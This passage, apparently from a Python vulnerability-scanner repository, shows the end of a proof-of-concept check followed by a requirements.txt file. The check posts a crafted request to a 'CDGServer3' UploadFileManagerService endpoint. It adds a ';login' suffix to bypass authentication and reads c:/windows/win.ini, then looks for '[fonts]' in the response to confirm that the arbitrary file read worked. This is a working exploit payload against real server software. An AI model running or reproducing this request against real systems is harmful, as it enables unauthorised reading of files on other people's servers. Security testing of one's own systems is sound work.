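        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    # Sent as-is; no Content-Type is set, so requests presumably defaults it for a str body —
    # NOTE(review): confirm the server accepts that before changing the header set.
    data = '''command=ViewUploadFile&filePath=c:/windows/win.ini&fileName1=111111'''
    vurl = urllib.parse.urljoin(url, "/CDGServer3/document/UploadFileManagerService;login")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        # ``[fonts]`` is a section header of win.ini, so its presence means the file was served.
        if response.status_code == 200 and '[fonts]' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
            return result
    except requests.RequestException:
        # Network-level failure: report "not vulnerable" rather than crash the worker.
        return result
    # Marker absent: still hand back a well-formed result instead of None.
    return result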
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | urllib3~=1.26.9
2 | requests~=2.28.1
3 | mmh3~=4.0.1
4 | dnslib~=0.9.24
5 | rich~=13.7.1
6 | chardet~=5.0.0
7 | bs4~=0.0.1
8 | beautifulsoup4~=4.11.2
9 | colorama~=0.4.4
--------------------------------------------------------------------------------